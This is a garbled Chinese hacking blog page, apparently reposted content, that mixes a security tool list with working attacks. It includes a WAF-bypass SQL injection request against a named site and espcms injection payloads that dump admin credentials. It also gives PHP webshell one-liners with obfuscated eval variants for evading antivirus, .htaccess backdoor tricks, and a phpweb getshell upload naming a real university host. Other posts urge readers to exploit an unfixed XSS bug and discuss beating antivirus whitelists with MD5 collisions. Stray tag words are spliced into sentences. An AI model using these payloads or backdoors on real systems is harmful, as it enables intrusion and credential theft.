最佳的75個安全工具

時間 2021-08-15

標籤 php html python mysql linux ios nginx 程序員 web 算法欄目系統安全简体版

原文原文鏈接

http://zhan.renren.com/hackthewebsite?tagId=142790&page=2&from=pages&checked=true
WEB***
創新工廠安全寶安全防禦繞過漏洞
漏洞詳情
簡要描述：php

安全寶本質是CND加DDOS防禦加web安全防禦,其web安全防禦功能存在漏洞，能夠輕易繞過。
詳細說明：html

web安全防禦就想到於一個WAF，可是WEB應用過於複雜，很容易就能繞過，如安全寶沒法防禦80SEC所發現的幾種***方法：參考python

http://www.80sec.com/淺談繞過waf的數種方法.html
漏洞證實：mysql

以下面安全保護的網站www.51qljr.com，若是攔截到SQL注入***是405狀態，用下面的包發送SQL注入***將繞過安全保護。linux

GET /xinxi/shownews.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.51qljr.com
Pragma: no-cache
Content-Length: 21
Content-Type: application/x-www-form-urlencodedios

id=572' and 1=1--
修復方案：nginx

web應用太複雜，還有各類複雜場景能夠繞過相似的安全防禦。
版權聲明：轉載請註明來源 rayh4c@烏雲程序員

# ***
# web***web

2算法

分享回覆3 喜歡

Nginx 0day 空字節執行漏洞

Nginx %00空字節執行任意代碼(php)漏洞

nginx 0.5.*nginx 0.6.*nginx 0.7 <= 0.7.65nginx 0.8 <= 0.8.37

Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx
Ngnix在遇到%00空字節時與後端FastCGI處理不一致，致使能夠在圖片中嵌入PHP代碼而後經過訪問xxx.jpg%00.php來執行其中的代碼

In vulnerable versions of nginx, null bytes are allowed in URIs by default

(their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h).
Individual modules have the ability to opt-out of handling URIs with null bytes.

However, not all of them do; in particular, the FastCGI module does not.

# ***
# web***

分享回覆喜歡

同志們~點擊一下本站上面的分享按鈕吧~~大家給力，我就給力，更多最新最ing 的***諮詢，技術~關注web***小站吧~

# web***
# ***

分享回覆1 喜歡

0day搜索和下載站點

http://mukki.org/
http://www.newreleases.ws/0day/

http://www.wooyun.org/

之後慢慢更新

# web***
# ***

分享回覆喜歡

Backtrack5 R1-cn藍盾漢化測試版鏡像下載

下載地址：

ed2k://|file|BT5-R1-CN.iso|2265214976|1B1B0C02481141A7E397E36B101E1AAF|h=L5WZNET7TAMXYISSLQDWHP6CR7VD535V|/

安裝以及使用說明：

http://115.com/file/aqv3qky6#BackTrack%E4%B8%AD%E6%96%87%E6%8C%87%E5%8D%97V8.pdf

# ***
# web***

分享3 回覆6 喜歡

最佳的75個安全工具

最佳的75個安全工具工具：Nessus（最好的開放源代碼風險評估工具）
網址：http://www.nessus.org/
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：Nessus是一款能夠運行在Linux、BSD、Solaris以及其餘一些系統上
的遠程安全掃描軟件。它是多線程、基於插入式的軟件，擁有很好的 GTK界面，可以完成超過1200
項的遠程安全檢查，具備強大的報告輸出能力，能夠產生HTML、XML、LaTeX和ASCII文本等格式的安
全報告，而且會爲每個發現的安全問題提出解決建議。
--------------------------------------------------------------------------------
工具：Ethereal（網絡協議檢測工具）
網址：http://www.ethereal.com/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Ethereal是一款免費的網絡協議分析程序，支持Unix、
Windows。藉助這個程序，你既能夠直接從網絡上抓取數據進行分析，也能夠對由其餘嗅探器
抓取後保存在硬盤上的數據進行分析。你能交互式地瀏覽抓取到的數據包，查看每個數據包的摘要
和詳細信息。Ethereal有多種強大的特徵，如支持幾乎全部的協議、豐富的過濾語言、易於查看TCP
會話經重構後的數據流等。
--------------------------------------------------------------------------------
工具：Snort（免費的***檢測系統）
網址：http://www.snort.org/
類別：
開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Snort是一款輕量級的網絡***檢測系統，
可以在IP網絡上進行實時的流量分析和數據包記錄。它不只能進行協議分析、內容檢索、內容匹配，
並且能用於偵測諸如緩衝溢出、隱祕端口掃描、CGI***、SMB探測、操做系統指紋識別等大量的***
或非法探測。Snort使用靈活的規則去描述哪些流量應該被收集或被忽略，而且提供一個模塊化的探測引擎。
--------------------------------------------------------------------------------
工具：Netcat（網絡瑞士×××）
網址：http://www.atstake.com/research/tools/network_utilities/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：一個簡單而有用的工具，透過使用TCP或UDP協議的網絡鏈接去讀寫數據。它被設計成一個穩定的後門工具，可以直接由其它程序和腳本輕鬆驅動。同時，它也是一個功能強大的網絡調試和探測工具，可以創建你須要的幾乎全部類型的網絡鏈接，還有幾個頗有意思的內置功能。
--------------------------------------------------------------------------------
工具：TCPDump/WinDump（用於網絡監測和數據收集的優秀嗅探器）
網址：http://www.tcpdump.org/，http://windump.polito.it/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Tcpdump是一款衆人皆知和受人喜歡的基於命令行的網絡數據
包分析和嗅探工具。它能把匹配規則的數據包的包頭給顯示出來。你能使用這個工具去查找網絡問題或者去監視網絡上的情況。WinDump是Tcpdump在Windows平臺上的移植版。
--------------------------------------------------------------------------------
工具：Hping2（相似ping的網絡探測工具）
網址：http://www.hping.org/
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：hping2能發送自定義的ICMP/UDP/TCP包到目標地址而且顯示包的響應狀況。它有一
個方便的traceroute模式，而且支持IP分片。這個工具在traceroute、ping和探測防火牆後的主機時特別有用。

工具：Firewalk（高級的traceroute）
網址：http://www.packetfactory.net/projects/firewalk/
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：Firewalk使用相似traceroute的技術來分析IP
包的響應，從而測定網關的訪問控制列表和繪製網絡圖。2002年10月，這個一流的工具在原來的基礎
上進行了從新開發。須要注意到的是，Firewalk裏面的大多數功能也能由Hping2的traceroute選項來實現。
--------------------------------------------------------------------------------
工具：Cain & Abel（窮人的L0phtcrack）
網址：http://www.oxid.it/cain.html
類別：免費
平臺：Windows
簡介：Cain & Abel是一個針對Microsoft操做系統的免費
口令恢復工具。它經過以下多種方式輕鬆地實現口令恢復：網絡嗅探、破解加密口令（使用字典或強
行***）、解碼被打亂的口令、顯示口令框、顯示緩存口令和分析路由協議等。源代碼不公開。
--------------------------------------------------------------------------------
工具：
XProbe2（主動操做系統指紋識別工具）
網址：http://www.sys-security.com/html/projects/X.html
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：XProbe是一款測定遠程主機操做系統類型
的工具。它依靠與一個簽名數據庫的模糊匹配以及合理的推測來肯定遠程操做系統的類型，利用
ICMP協議進行操做系統指紋識別是它的獨到之處。
--------------------------------------------------------------------------------------------------------------------------------------------------------------
工具：SolarWinds Toolsets（大量的網絡發現、監視、***工具）
網址：http://www.solarwinds.net/
類別：商業
平臺：Windows
簡介：SolarWinds包含大量適合系統管理員作特殊用途的工具，與安全相關的工具包括許多的網
絡發現掃描器（network discovery scanner）和一個SNMP強力破解器。
--------------------------------------------------------------------------------
工具：NGrep（方便的包匹配和顯示工具）
網址：http://www.packetfactory.net/projects/ngrep/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：NGrep在網絡層實現了GNU grep的大多數功能，基於pcap，可使你經過指定擴展的正則表達
式或十六進制表達式去匹配網絡上的數據流量。它當前可以識別
流經以太網、PPP、 SLIP、FDDI、令牌網和迴環設備上的TCP、UDP和ICMP數據包，而且和其餘
常見的嗅探工具（如tcpdump和snoop）同樣，理解bpf 過濾機制。
--------------------------------------------------------------------------------
工具：Perl/Python（腳本語言）
網址：http://www.perl.org，http://www.python.org/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：當咱們使用那些已經開發好的安全工具來處理任務時，別忘了能
本身寫出（或修改）安全程序也是一件很是重要的事情。利用Perl和Python
能很是容易地寫出用
於系統測試、exploit和修補的腳本程序，使用包含Net::RawIP和協議實現等模塊的CPAN
（Comprehensive Perl Archive Network：http://www.cpan.org/）
或相似的檔案能幫助咱們比較容易地進行相關的開發。
--------------------------------------------------------------------------------
工具：THC-Amap（應用程序指紋識別掃描器）
網址：http://www.thc.org/releases.php
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：由THC開發的Amap是一個功能強大的掃描器，它經過探測端口響應的
應用程序指紋數據來識別應用程序和服務，遠甚於經過缺省端口號來判斷應用程序和服務的方法。
--------------------------------------------------------------------------------
工具：OpenSSL（最爲重要的SSL/TLS加密庫）
網址：http://www.openssl.org/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：OpenSSL項目是共同努力開發出來的一個健全的、商業級的、
全開放的和開放源代碼的工具包，用於實現接層協議(SSL v2/v3)和傳輸層安全協議(TLS v1)
以及造成一個功效完整的通用加密庫。該項目由全世界範圍內志願者組成的團體一塊兒管理，
他們使用Internet去交流、設計和開發這個 OpenSSL工具和相關的文檔。
工具：NTop（網絡使用情況監測軟件）
網址：http://www.ntop.org/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Ntop是一款顯示網絡使用情況的流量監測軟件，相似於
UNIX平臺上監視系統進程的top命令。在交互模式下，ntop會將網絡的使用情況顯示在用戶的終端上；
在Web模式下，ntop會作爲一個web服務器，建立包含網絡情況的HTML網頁返回給用戶。
--------------------------------------------------------------------------------
工具：Nemesis（命令行式的UNIX網絡信息包插入套件）
網址：http://www.packetfactory.net/projects/nemesis/
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：Nemesis項目是爲了開發一個UNIX/Linux系統上基於命令行的、方便人們使用的IP棧，
它能夠自定義數據包、插入數據包、進行協議***等，
是一個很好的測試防火牆、***檢測系統、路由器和其餘網絡設備的工具。若是你對Nemesis感興趣，
那麼你也可能須要看看hping2，這二者補相互之不足。
--------------------------------------------------------------------------------
工具：LSOF（列出打開的文件）
網址：ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
類別：
開放源碼
平臺：Linux/BSD/Unix
簡介：LSOF是針對Unix的診斷和分析工具，它能顯示出由
系統里正在運行的進程所打開的文件，也能顯示出每個進程的通信socket。
-------------------------------------------------------------------------------
工具：Hunt（Linux平臺上高級的包嗅探和會話劫持工具）
網址：http://lin.fsid.cvut.cz/~kra/index.html#HUNT
類別：開放源碼
平臺：Linux
簡介：Hunt能監視、劫持、重設網絡上的TCP鏈接，
在以太網上使用纔有做用，而且含有監視交換鏈接的主動機制，以及包括可選的ARP轉播和劫持成功
後的鏈接同步等高級特徵。
--------------------------------------------------------------------------------
工具：Honeyd（你我的的honeynet，http://www.honeynet.org/）
網址：http://www.citi.umich.edu/u/provos/honeyd/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Honeyd是一個能在網絡上建立虛擬主機的小小後
臺程序，虛擬主機能被配置成運行任意的服務，而且洽當的服務TCP特性以至他們看起來就像是運行
在某個特定版本的操做系統上。Honeyd能在一個模擬的局域網環境裏讓一臺主機配有多個地址，而且
能夠對虛似主機進行ping、traceroute。虛擬主機上任何類型的服務均可以依照一個簡單的配置文
件進行模擬。Honeyd也能夠對一臺主機作代理服務，而不是模擬它。
--------------------------------------------------------------------------------
工具：Achilles（能夠修改http會話包的代理程序）
網址：http://packetstormsecurity.nl/filedesc/achilles-0-27.zip.html
類別：開放源碼
平臺：Windows
簡介：Achilles是一個設計用來測試web應用程序安
全性的工具。它是一個代理服務器，在一個HTTP會話中扮演着「中間人」（man-in- the-middle）的角
色。一個典型的HTTP代理服務器將在客戶瀏覽器和web服務器間轉發數據包，但Achilles卻載取發向任
一方的HTTP 會話數據，而且在轉發數據前可讓用戶修改這些數據。
--------------------------------------------------------------------------------
工具：Brutus（網絡認證的強行破解工具）
網址：http://www.hoobie.net/brutus/
類別：免費
平臺：Windows
簡介：Brutus是一款對遠程服務器的網絡服務進行口令猜解的工具，支持字典***和組合***，
支持的網絡應用包括HTTP、POP三、FTP、SMB、TELNET、IMAP、NTP等。源代碼不公開。
UNIX系統上的THC-Hydra有相似的功能。
--------------------------------------------------------------------------------
工具：Stunnel（一個多種用途的SSL加密外殼）
網址：http://www.stunnel.org/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Stunnel程序被設計用來作爲本地客戶端和遠程服務器間的SSL加
密外殼。它能在POP二、POP三、IMAP等使用inetd後臺進程的服務器上增長SSL功能，而且不會影響
到程序源代碼。它使用OpenSSL或SSLeay庫創建SSL會話鏈接。
--------------------------------------------------------------------------------
工具：Paketto Keiretsu（極端的TCP/IP）
網址：http://www.doxpara.com/paketto
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：Paketto Keiretsu是一組使用新式的不常見的策略去操做TCP/IP網
絡的工具集合，開發的最初本意是爲了在現有TCP/IP架構裏去實現一些功能，但如今已經遠遠超出
了最初的本意。包含的工具備：Scanrand，一個罕見的快速的網絡服務和拓樸發現系統；Minewt，一
個NAT/MAT路由器； linkcat，把以太網鏈路作爲標準的輸入輸出；Paratrace，不產生新的連
接就能追蹤網絡路徑；Phentropy，使用OpenQVIS在三維拓樸空間裏能繪製出任意總量的數據源圖形。

工具：Fragroute（破壞***檢測系統最強大的工具）
網址：http://www.m&#111nkey.org/~dugsong/fragroute/
類別：開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Fragroute可以截取、修改和重寫向外發送的報文，
實現了大部分的IDS***功能。Fragroute起重要做用的是一個簡單的規則設置語言，以它去實現延遲
、複製、丟棄、碎片、重疊、打印、重排、分割、源路由或其餘一些向目標主機發送數據包的***。
這個工具開發的本意是去測試***檢測系統、防火牆、基本的TCP/IP棧的行爲。像Dsniff、Libdnet
同樣，這個優秀的工具也是由Dug Song開發的。
--------------------------------------------------------------------------------
工具：SPIKE Proxy
網址：http://www.immunitysec.com/spikeproxy.html
類別：
開放源碼
平臺：Linux/BSD/Unix/Windows
簡介：Spike Proxy是一個開放源代碼的HTTP代
理程序，用於發現web站點的安全缺陷。它是Spike應用程序測試套件
（http://www.immunitysec.com/spike.html）的一部份，支
持SQL插入檢測、web站點檢測、登陸表單暴力破解、溢出檢測和字典窮舉***檢測等。
-------------------------------------------------------------------------------
工具：THC-Hydra（網絡認證的破解工具）
網址：http://www.thc.org/releases.php
類別：開放源碼
平臺：Linux/BSD/Unix
簡介：這個工具能對須要網絡登陸的系統進行快速的字典***，
包括FTP、POP三、IMAP、Netbios、Telnet、HTTP Auth、LDAP NNTP、VNC、ICQ、Socks五、PCNFS等，
支持SSL，而且如今是Nessus風險評估工具的一部份。
--------------------------------------------------------------------------------
其餘的25個最佳安全工具：
OpenBSD，http://www.openbsd.org/：安全可靠的操做系統。
TCP Wrappers，ftp://ftp.porcupine.org/pub/security/index.html：一流
的IP訪問控制和日誌的實現機制。
pwdump3，http://www.polivec.com/pwdump3.html：
獲取本地或遠程Windows主機的口令哈希，而無論是否安裝了syskey。
LibNet，http://www.packetfactory.net/libnet/: 容許程序員去構造
和插入網絡數據包的高水平開發函數庫.
IpTraf，http://cebu.mozcom.com/riker/iptraf/: IP網絡監控軟件。
Fping，http://www.fping.com/：一次能夠ping多個IP地址的掃描程序。
Bastille，http://www.bastille-linux.org/：加強系統安全性的腳本程序，支持Linux,
Mac OS X和HP-UX操做系統。
Winfingerprint，http://winfingerprint.sourceforge.net/: 一款基於Win32的
高級遠程系統掃描器。
TCPTraceroute，http://michael.toren.net/code/tcptraceroute/:使用TCP SYN
包實現traceroute的工具。
Shadow Security Scanner，http://www.safety-lab.com/en2/products/1.htm：一款商業化
的風險評估工具。
pf，http://www.benzedrine.cx/pf.html：OpenBSD系統內頗有特點
的包過濾防火牆。
LIDS，http://www.lids.org/：Linux內核上的***檢測和***防護系統。
hfnetchk，http://www.microsoft.com/technet/treeview/default.asp?
rl=/technet/security/tools/tools/hfnetchk.asp：微軟發佈的用於
檢查網絡上Windows主機
補丁安裝狀況的工具。
etherape，http://etherape.sourceforge.net/：繼流量監測軟件etherman以後又一個
支持unix的圖形化網絡情況監測軟件。
dig，http://www.isc.org/products/BIND/：Bind附帶的DNS查詢工具。
Crack/Cracklib，
http://www.users.dircon.co.uk/~crypto/：一流的本地口令破解器。
cheops/cheops-ng，http://www.marko.net/cheops/，
http://cheops-ng.sourceforge.net/：
繪製本地或遠程網絡的網絡圖，而且也能識別主機的操做系統類型。
zone alarm，
http://www.zonelabs.com/：Windows平臺上的我的防火牆軟件。
Visual Route，http://www.visualware.com/visualroute/index.html：
獲取traceroute/whois數據，而且繪製出數據包通過的網絡路線在世界地圖上的位置。
The Coroner`s Toolkit (TCT)，http://www.fish.com/tct/：運行於Unix系統上的
文件系統檢查及緊急修復工具集。
tcpreplay，http://tcpreplay.sourceforge.net/：
能把tcpdump或snoop保存下來的流量監測文件在任意點進行回放的工具。
snoop，http://www.spitzner.net/snoop.html：Solaris系統附帶的
網絡嗅探工具。
putty，
target=_blank>http://www.chiark.greenend.org.uk/~sgtatham/putty/：
Windows平臺上優秀的SSH客戶端。
pstools，http://www.sysinternals.com/ntw2k/freeware/pstools.shtml：
一套用於管理Windows系統的免費命令行工具。
arpwatch，http://www-nrg.ee.lbl.gov/：主要用來檢測
mac地址和ip地址對應關係的工具

# ***
# web***

分享2 回覆3 喜歡

【轉載】土司真摳門免費了把多年的tuo褲腳本都送出來了

昨天小狼想我問Oracle的***腳本我看看貌似土司都木有我發個集合的吧

mssql

mysql

Oracle

的所有打包了

下載地址：

http://www.ctdisk.com/file/3289059

# ***
# web***

分享回覆喜歡

【轉載】淺析php後門***

php後門***對你們來講一點都不陌生吧，可是它的種類您又知多少呢？
本文爲您淺析說明一些php後門***經常使用的函數

php後門***經常使用的函數大體上可分爲四種類型：
1. 執行系統命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代碼執行與加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含與生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

1. 執行系統命令:

system 函數

//test.php?cmd=ls
system($_GET[cmd]);

passthru 函數

//test.php?cmd=ls
passthru($_GET[cmd]);

shell_exec 函數

//test.php?cmd=ls
echo shell_exec($_GET[cmd]);

exec 函數

//test.php?cmd=ls
$arr = array();
exec($_GET[cmd],$arr);
print_r($arr);

popen 函數

//test.php?cmd=ls
$handle = popen('$_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);

proc_open 函數

//test.php?cmd=ls
$descriptorspec = array(
       0 => array('pipe', 'r'),
       1 => array('pipe', 'w'),
       2 => array('pipe', 'w'),
    );
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);

2. 代碼執行與加密:

eval 函數

//最多見的一句話***
eval($_POST[cmd]);

base64_decode 函數

//爲了免殺及隱藏而加密代碼
//密文: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

gzinflate 函數

//爲了免殺及隱藏而加密代碼
//密文: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));

gzuncompress 函數

//爲了免殺及隱藏而加密代碼
//密文: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));

gzdecode 函數

//爲了免殺及隱藏而加密代碼
//密文: eval($_POST['cmd']);
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));

str_rot13 函數

//爲了免殺及隱藏而加密代碼
//密文: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));

assert 函數

//相似eval函數
assert($_POST[cmd]);

call_user_func 函數

//使用call_user_func調用assert
call_user_func('assert',$_POST[cmd]);

call_user_func 函數

//使用call_user_func調用任意函數
//test.php?a=assert&cmd=phpinfo()
call_user_func($_GET[a],$_REQUEST[cmd]);

組合代碼

//組合方式調用任意函數
//test.php?a=assert&cmd=phpinfo()
$_GET[a]($_REQUEST[cmd]);

3. 文件包含與生成:

require 函數

//包含任意文件
//test.php?file=123.jpg
require($_GET[file]);

require_once 函數

//包含任意文件
//test.php?file=123.jpg
require_once($_GET[file]);

include 函數

//包含任意文件
//test.php?file=123.jpg
include($_GET[file]);

include_once 函數

//包含任意文件
//test.php?file=123.jpg
include_once($_GET[file]);

file_get_contents 函數

//讀取任意文件
//test.php?f=config.inc.php
echo file_get_contents($_GET['f']);

file_put_contents 函數

//生成任意內容文件
//a=test.php&b=<?php eval($_POST[cmd]);?>
file_put_contents($_GET[a],$_GET[b]);

fputs 函數

//生成任意內容文件
//a=test.php&b=<?php eval($_POST[cmd]);?>
fputs(fopen($_GET[a],"w"),$_GET[b]);

4. .htaccess:

SetHandler

//可將php代碼存於非php後綴文件,例: x.jpg
//將如下代碼寫入.htaccess中
//鏈接x.jpg便可啓動後門***
<FilesMatch "x.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

auto_prepend_file

//可將php代碼存於非php後綴文件,例: 123.gif
//將如下代碼寫入.htaccess中, 文件路徑必須是絕對路徑
//訪問網站上任何php文件都會啓動該php後門***
//可在不更改站點源代碼的狀況下記錄全部$_REQUEST的值，也可批量掛馬
php_value auto_prepend_file c:/apache2/htdocs/123.gif

auto_append_file

//相似auto_prepend_file
//可將php代碼存於非php後綴文件,例: 123.gif
//將如下代碼寫入.htaccess中, 文件路徑必須是絕對路徑
//訪問網站上任何php文件都會啓動該php後門***
php_value auto_append_file c:/apache2/htdocs/123.gif

另外也針對以上特徵碼寫了一個php web版線上掃描工具

http://www.t00ls.net/viewthread.php?tid=18951

# ***
# web***

分享1 回覆喜歡

【轉載】科迅官方XSS漏洞

用戶後臺發信箱標題直接插入JS腳本S

收信者即會中招，偶對管理員進行了測試！不過2分鐘就收到信了！

科迅CMS會將用戶、密碼、認證碼存入COOKIE。。。

而後你懂得！！！

漏洞已反饋，發帖之時還未修復，想X的童鞋速度！

# ***
# web***

分享回覆喜歡

你們幫忙推薦推薦啊~~人越多才有精氣神來發0day！！你們給力纔是真的給力！

# web***

分享回覆7 喜歡

[【轉載T00ls】] 隨風分類信息程序1.4COOKIES欺騙

[【原創】] 隨風分類信息程序1.4COOKIES欺騙

admin/index.php

<? require_once("../conn.php");?>

$user=cstr($_POST["user"]);

$pass=cstr($_POST["pass"]);

if($_GET["post"]=="action"){

$sql=mysql_query("select * from config where s_user='".$user."' and s_pass='".$pass."'");

$rs=mysql_fetch_array($sql);

if($rs["id"]==""){

echo "<script>alert('用戶名或密碼錯誤，請重新輸入！ (默認密碼是:123456)');window.location.href='index.php';</script>";

exit;

}else{

setcookie("admin","windows250523691",time()+3600);

echo "<script>window.location.href='admin.php';</script>";

exit;

}

setcookie("admin","windows250523691",time()+3600);

# ***
# web***

分享回覆喜歡

[【Exp】] espcms 0day

爲證實我一直默默在T00LS..

發個小0day!!

百度關鍵字：inurl:index.php?ac=article&at=read&did=

注入點(爆表前綴）：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用戶名:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密碼：

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    # ***
    # web***
    # 牛b

分享回覆1 喜歡

phpweb 注射、上傳、安裝文件漏洞、萬能密碼

############################################################################## Title: phpweb 注射、上傳、安裝文件漏洞、萬能密碼# Time：2011-10-15# Team: # Author: lostowlf#############################################################################home: hi.baidu.com/nginxshell-----------------------exploit-------------------******sqlinjection******* http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}http://www.phpweb.net/photo/clas ... mp;key=&myord=1 {sqlinjection}***********getshell********POST /kedit/upload_cgi/upload.php HTTP/1.0www.90sec.org" Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*Referer: http://phpweb.net/news/admin/new ... p;pid=all&page= Accept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7db516c0118UA-CPU: x86Pragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: lib.jlnu.edu.cnProxy-Connection: Keep-AliveCookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. VContent-Length: 6620-----------------------------7db516c0118Content-Disposition: form-data; name="fileName"201110121318373662005.php;.jpg-----------------------------7db516c0118Content-Disposition: form-data; name="attachPath"news/pics/-----------------------------7db516c0118Content-Disposition: form-data; name="fileData"; filename="C:\6.gif"Content-Type: p_w_picpath/gifgif89a<?php fputs(fopen('test.php','w'),'<?php eval($_POST[lostwolf])?>');?>*********install file:**********http://www.url.com/base/install/*********admin********www.url.com/admin.phpusername: admin 'or '1'='1username: admin 'or '1'='1-----------------------exploit end -------------------

    # web***
    # ***
    # python

分享回覆喜歡

使用 MD5 碰撞算法假裝***，躲過殺毒軟件查殺，加入360白名單

MD5 碰撞算法假裝***，躲過殺毒軟件查殺，加入360白名單。MD5 碰撞發生器 v1.5，fastcoll_v1.0.0.5.exe，MD5 Collision Generator v1.5，根據王小云教授的算法寫的MD5碰撞的程序。

快速MD5碰撞生成器，王小云改進版。這個生成器根據「構造前綴碰撞法」能夠生成兩個不一樣的文件，而這兩文件的md5 sum倒是同樣的。

構造前綴碰撞法可製做兩個內容不一樣但具備相同MD5驗證碼的文件。

----------------------------------------------------------------

剛纔在 T00ls.net 看到個帖子，內容以下（內容有修改，去除了一些不重要的回帖）：

樓主：

年前購買了一個免殺遠*,300￥一個月,免殺效果確實牛B，過國內外主流殺軟，在手3個月都沒殺，大概5月份360更新後要提示了，而後聯繫客服更新，這樣陸陸續續更新了幾回，效果都很好，9月底，360更新後所有殺了,而後聯繫客服,客服說之前的技術被360分析出來了，而後讓咱們等待2周時間，那邊技術在研發新的技術，國慶節後客服發過來一個更新的遠*,我測試之後都過，在360進程查看器和網絡鏈接查看都提示文件安全，但過了一天360又報文件爲***文件，我再次聯繫客服，客服讓等1個小時，所技術正在解決,而後一個小時後，360又不殺了，提示安全（注:馬仍是之前的馬，沒有更新過,MD5這些都是同樣的！）

難道遠控的技術和360!!!,

求解！！！

樓主：

我想了解的是爲何360殺了，而後一個小時後，一樣的文件360又不殺了，其餘什麼認證，地下工做者我就不想去了解了

路人甲：

二種可能 360內部人賣馬，360被日了

路人乙：

1.360內部人賣馬
2.360被日了
3.lz傻了？

路人丙：

360收黑錢，不幹人事，鑑定完畢。
還有你把這個馬發別人那看殺不

樓主：

回覆路人丙

都不殺，已經測試過了

路人丁：

萬一是遠控的雲端也在作某種遠程更新呢？不能說MD5不變，就是有JQ，無憑無據。

路人戊：

exe的MD5不變，不表明exe確定不下載新的DLL或其餘的模塊吧？

本人回覆：

應該是認證環節被人有空子可鑽。。

本人回覆：

我認爲，最有可能的是認證環節，也就是360的白名單認證制度。

前提條件是，360是使用標準MD5值進行程序惟一性驗證。

但MD5有個問題就是，碰撞算法，能夠產生兩個MD5相同、但功能不相同的程序。

把正常的程序提交上去後，讓360認證，認證完畢，加到白名單，另外那個也「免殺」了。

據我所知，一年前（其實是2005年左右的）出了一個東西，自動生成同樣MD5值的程序的工具。

並且貌似支持根據指定程序生成一個同樣MD5值的程序。

若是360不是使用標準MD5的話，其餘算法也有此可能。

本人回覆：

MD5 Test_A.exe：與 B 的 MD5 相同，但功能不一樣。
MD5 Test_B.exe：與 A 的 MD5 相同，但功能不一樣。

---------------------------------------------

MD5 Test_A.exe：
MD5：F9E99485F226E07627D5180EF95FA473
大小：20.1 KB (20,608 字節)

MD5 Test_B.exe：
MD5：F9E99485F226E07627D5180EF95FA473
大小：20.1 KB (20,608 字節)

（2011-10-11 5:48:05 補充：而後我跑去寫了個小程序，MD5值同樣，但功能不一樣，原帖以附件的形式存在，這裏我給出下載地址。）

MD5_碰撞測試程序_示例程序.rar：http://115.com/file/clonsfie

實際上從2004年8月17，我國山東大學王曉雲教授破解MD5的論文發佈後，關於這個MD5碰撞算法的話題就不斷，幾年以後，就沒人討論了，在咱們這一代不少人都沒據說過，我也是一兩年前知道MD5碰撞算法，當時查閱了部分資料，瞭解了個大概。

我又把這個話題拉出來討論下，不過此次是討論的***免殺方面的。。。實際上也和免殺無關，只是從免殺想到的。

如上貼內容所示，若是能成功僞造MD5，那麼躲過殺毒軟件查殺，甚至加入白名單，都不是問題了。

題外話：我不知道360是否是使用的標準MD5算法驗證文件的，我從沒注意過。若是是的話，那麼，如今殺毒軟件中好像就只有360這個白癡還使用標準MD5算法驗證文件……

不過從如下內容來看、、360還真的是用MD5算法驗證文件的、、、真坑爹……

